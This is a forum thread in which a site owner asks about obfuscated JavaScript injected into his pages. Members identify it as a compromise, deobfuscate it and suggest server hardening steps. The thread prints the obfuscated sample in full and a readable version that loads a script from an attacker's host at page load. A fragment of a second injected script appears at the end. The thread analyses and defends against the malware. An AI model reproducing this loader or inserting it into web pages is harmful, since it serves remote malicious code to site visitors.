code auto added to my site..anyone tell me what is?
code auto added to my site..anyone tell me what is?
we have a site and suddenly weird things are happening.
my developer tells me some weird JavaScript has been added to multiple pages....but we (my company) didn't do it.
can anyone tell me about this code? (below) Has our site been hacked / infected?
We just found some kind of run time malware on another site...but it's on a different server.
very concerned.
any help would be great
G90
<script>
/*
 * Analyst annotation (added for readers; not part of the injected sample).
 * What the visible text shows:
 *  - Most statements are padding: variables that are declared, compared and
 *    reset (e.g. G, V, A, f, GU) and empty this.* assignments that nothing
 *    in the script reads.
 *  - The meaningful strings are assembled from fragments:
 *    R = "script", L = "appendChild", i = "onload", D = "defer", Q = "body".
 *  - N(q, p) builds the character class "[" + p + "]" with the "g" flag and
 *    deletes those characters from q. u = N('sqr4cp', ...) yields "src", and
 *    the three concatenated N(...) calls yield
 *    hxxp://pokesack[.]ru:8080/google.com/technorati.com/iciba.com.php
 *    (defanged here). The host is pokesack[.]ru on port 8080; the well-known
 *    site names are only path segments.
 *  - Z creates a script element, sets its defer property to 1 and appends to
 *    document.body; any exception is swallowed by the catch block.
 * NOTE(review): as rendered on this page the script reads "K=Z" and
 * "n = N(...)", and the variables i and u are never used. The index
 * expressions [i] and [u] were presumably consumed by the forum's BBCode
 * parser (italic / underline tags), so the live sample most likely had
 * K[i]=Z (window.onload) and n[u]=... (the element's src) -- confirm against
 * the file on disk. For the same reason this listing is not byte-faithful:
 * take hashes and signatures from the infected files, not from this page.
 */
var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
<!--52071e04b71ca66bacac9424ea495244-->
my developer tells me some weird JavaScript has been added to multiple pages....but we (my company) didn't do it.
can anyone tell me about this code? (below) Has our site been hacked / infected?
We just found some kind of run time malware on another site...but it's on a different server.
very concerned.
any help would be great
G90
<script>
/*
 * Analyst annotation (added for readers; not part of the injected sample).
 * What the visible text shows:
 *  - Most statements are padding: variables that are declared, compared and
 *    reset (e.g. G, V, A, f, GU) and empty this.* assignments that nothing
 *    in the script reads.
 *  - The meaningful strings are assembled from fragments:
 *    R = "script", L = "appendChild", i = "onload", D = "defer", Q = "body".
 *  - N(q, p) builds the character class "[" + p + "]" with the "g" flag and
 *    deletes those characters from q. u = N('sqr4cp', ...) yields "src", and
 *    the three concatenated N(...) calls yield
 *    hxxp://pokesack[.]ru:8080/google.com/technorati.com/iciba.com.php
 *    (defanged here). The host is pokesack[.]ru on port 8080; the well-known
 *    site names are only path segments.
 *  - Z creates a script element, sets its defer property to 1 and appends to
 *    document.body; any exception is swallowed by the catch block.
 * NOTE(review): as rendered on this page the script reads "K=Z" and
 * "n = N(...)", and the variables i and u are never used. The index
 * expressions [i] and [u] were presumably consumed by the forum's BBCode
 * parser (italic / underline tags), so the live sample most likely had
 * K[i]=Z (window.onload) and n[u]=... (the element's src) -- confirm against
 * the file on disk. For the same reason this listing is not byte-faithful:
 * take hashes and signatures from the infected files, not from this page.
 */
var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
<!--52071e04b71ca66bacac9424ea495244-->
Re: code auto added to my site..anyone tell me what is?
Took me 20 minutes, but reversed. Here is what it does:
This code loads a second JavaScript file from the pokesack.ru server; that script then adds an iframe to the page (the iframe's src is also on pokesack.ru).
Edit: this is my 666th post
// Analyst annotation: this listing is the forum member's hand-deobfuscated
// reconstruction of the injected script, not the literal text found on the site.
// Effect: once the page has loaded, each visitor's browser fetches and runs a
// script from a third-party host, so whoever controls that host decides what
// executes in the page. Assigning window.onload also replaces any handler the
// page had already set on that property.
window.onload = function () {
// `n` is assigned without var/let/const, so it becomes an implicit global.
n = document.createElement('script');
// Sets the element's defer property to a truthy value.
n.defer = 1;
// The host is pokesack.ru on port 8080; google.com, technorati.com and
// iciba.com appear only as path segments, not as the server being contacted.
n.src = 'http://pokesack.ru:8080/google.com/technorati.com/iciba.com.php';
document.body.appendChild(n);
}
> Has our site been hacked / infected?
Yes
Edit: this is my 666th post
Last edited by kaszu on Sun Apr 18, 2010 11:40 am, edited 1 time in total.
Re: code auto added to my site..anyone tell me what is?
Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.
Re: code auto added to my site..anyone tell me what is?
thanks....and S### lol
ok will look into it further.
ok will look into it further.
Re: code auto added to my site..anyone tell me what is?
Benjamin wrote: "Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort."
thankfully site is not yet live.
so no customers yet.......
anyone in these forums dealt with these kinds of run time doohickeys before?
i may need a pro on this. it's not my guy's field of expertise.
G90
Re: code auto added to my site..anyone tell me what is?
additional: hey kaszu thx for taking the time to track the source down and looking into it for me.
G90
G90
Re: code auto added to my site..anyone tell me what is?
Well, here's what I would do:
1. Locate the entry point they used to gain access and fix it.
2. Reprovision the server, e.g. reinstall Linux from scratch in case there are any rootkits installed. Your webhost can do this for you.
3. Check the entire code base for vulnerabilities, especially upload forms and unprotected variables in database queries.
4. Use the latest version of any external libraries, such as phpBB or whatever you may be using.
5. Use cPanel and enable brute force detection, which will automatically block IPs with many invalid logins.
6. Disable any services not being used. e.g. ssh, ftp.
7. Ensure a firewall is installed and be aware of what ports are open and who they are open to.
I'm sure I'm missing some things, but this is a good start.
1. Locate the entry point they used to gain access and fix it.
2. Reprovision the server, e.g. reinstall Linux from scratch in case there are any rootkits installed. Your webhost can do this for you.
3. Check the entire code base for vulnerabilities, especially upload forms and unprotected variables in database queries.
4. Use the latest version of any external libraries, such as phpBB or whatever you may be using.
5. Use cPanel and enable brute force detection, which will automatically block IPs with many invalid logins.
6. Disable any services not being used. e.g. ssh, ftp.
7. Ensure a firewall is installed and be aware of what ports are open and who they are open to.
I'm sure I'm missing some things, but this is a good start.
Re: code auto added to my site..anyone tell me what is?
I get better support here than from my hosting company....who said "we can't touch your code..sorry"
Re: code auto added to my site..anyone tell me what is?
ok spent almost a week...got almost everything.
but just found this. is this another instance of the hack or something else?
dont want to delete just in case
<script>var j;if(j!='FJ' && j!='y'){j=''};this.TJ='';try {var C;if(C!='' && C!='Z'){C=''};var br='';var F=window[unescape("%75%6e%65%73%63%61%70%65")];this.PN="";var G;if(G!='' && G!='Y'){G=''};var ZV=
but just found this. is this another instance of the hack or something else?
dont want to delete just in case
<script>var j;if(j!='FJ' && j!='y'){j=''};this.TJ='';try {var C;if(C!='' && C!='Z'){C=''};var br='';var F=window[unescape("%75%6e%65%73%63%61%70%65")];this.PN="";var G;if(G!='' && G!='Y'){G=''};var ZV=